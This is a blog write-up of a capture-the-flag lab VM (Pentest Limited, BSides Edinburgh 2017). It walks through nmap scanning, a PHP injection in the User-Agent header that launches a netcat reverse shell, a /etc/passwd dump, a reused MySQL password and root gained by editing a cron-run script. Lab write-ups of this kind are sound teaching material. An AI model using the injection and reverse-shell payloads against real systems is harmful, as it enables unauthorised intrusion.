Pentest Limited's BSides Edinburgh Write up

Security

This is the second VM that I have tried from Pentest Limited. The report of the Securi-Tay CTF challenge can be found here. As usual, I downloaded the VM (located here) and imported it in to virtual box. Once I had changed the networking to my local host based network (vmbox0), I was ready to start taking a closer look. Initially, I did a ping sweep to determine the IP address of the target.




# nmap -sP 192.168.56.1/24



Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-20 22:56 BST

Nmap scan report for 192.168.56.100

Host is up (0.000065s latency).

MAC Address: 08:00:27:E0:C9:C2 (Oracle VirtualBox virtual NIC)

Nmap scan report for 888.darknet.com (192.168.56.103)

Host is up (0.0012s latency).

MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.1

Host is up.

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.94 seconds






Once I had the IP address, I then performed a port scan of the main server to reveal a single TCP port open (80 - HTTP):




# nmap -sT 192.168.56.103



Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-20 22:56 BST

Nmap scan report for 888.darknet.com (192.168.56.103)

Host is up (0.00066s latency).

Not shown: 999 closed ports

PORT   STATE SERVICE

80/tcp open  http

MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)





Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds




So without much delay I fired up a web browser, burp suite, archni and dirbuster and took a closer look...


The initial page I was greeted with looked like this:



BSides Edinburgh CTF 2017 challenge.



 



 



 



 



 



 



 



 



 



Hovering over the links, at least one was broken (double https://), but the main interesting part was the infromation about the browser. This information is treated as a variable within PHP, which is passed to the server from the client. Despite it being set, with Burp suite, it can be manipulated.



At this time, Dirbuster also completed, and revelled some interesting pages:



Dirbuster results.



 



 



 



 



 



 



 



 



 



 



 



 



 



 



 



 



The robots.txt file also pointed out to /Dev as being a folder of interest, as it is disallowed:



/Dev directory listing



 



 



 



 



 



 



 



 



Thinking I couldn't be that lucky, I clicked on the file, to reveal, I wasn't:



/Dev/passwd file - Todo Backups



 



 



 



Going back to list of pages from dirbuster, test.php stood out. When viewing the page, it was a list of previous connections, with the useragent again. Going back to the index page, I accessed the page, but changed my useragent via burp to:




User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0; <?php `netcat 192.168.56.1 8888 -e '/bin/sh'` ?>




A netcat listener was waiting on port 8888 for my connection. Viewing the test page, the connection sprang in to life and connected as the user "www-data".



Once on the platform, I then fixed my terminal by running:




bash 2>&1

python -c 'import pty; pty.spawn("/bin/sh")'




Once I had the fixed up terminal, I downloaded the Laudanum shell to the uploads directory (world writable) for better recurring access.



Looking at the /etc/passwd file, I found the following:




$ cat /etc/passwd

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false

systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false

systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false

systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

Debian-exim:x:104:109::/var/spool/exim4:/bin/false

messagebus:x:105:110::/var/run/dbus:/bin/false

statd:x:106:65534::/var/lib/nfs:/bin/false

ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash

mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin

r00t::0:0:0wned:/home/r00t:/bin/sh

r00t::0:0:0wned:/home/r00t:/bin/sh




The last entries were interesting. Looked like a previous hack attempt, with no password. Unfortunately, I wasn't able to become the r00t, since I didn't want to log in via the terminal within virtual box. My reasoning for this was that if I was going to look at the console, I could have rooted the box easily upon start up.



Also, mysql and exim4 being present reminded my of the previous challenge for Pentest Limited. I did wonder if the VM had been built from the same template. I tried to log in to mysql as root with the password rorschach, which worked. At this point I was able to become root as per the previous write up.



This, however, wasn't good enough. I didn't like the fact that I hadn't learned anything and I had got root based entirely by chance. So I went back and had a look again.



Looking in the CTFUser's home directory, I found that there was a log clearing script.




#cat clearlog.sh

#!/bin/sh

echo '' > /var/www/html/9didkaskdhjdfh44/log.txt




Using a symlink to test, I was able to empty a file owned by root in the web server directory, which indicated that root was running the script. The script was also owned by ctfuser. My next logical step was to become root. I tried to brute force the user, and my first guess, ctfuser, was correct! Once I was ctfuser, I added a line to the file to start netcat on port 8889, started a local listener and at the next 5 minute mark, I was greeted with a root prompt. Fixing the terminal again, I captured the flag in /root:



The flag captured!



 



 



 



In conclusion, my main takeaways from this VM were that template reuse is a thing, and can be a pain for defenders. My other takeaway was that I was not happy with the first way to get root, and trying different methods is aways fun. While I didn't necessarily learn anything new, the challenge was no less entertaining.


Comments

Display comments as (Linear | Threaded)

    No comments


Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.
To leave a comment you must approve it via e-mail, which will be sent to your address after submission.
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.

Submitted comments will be subject to moderation before being displayed.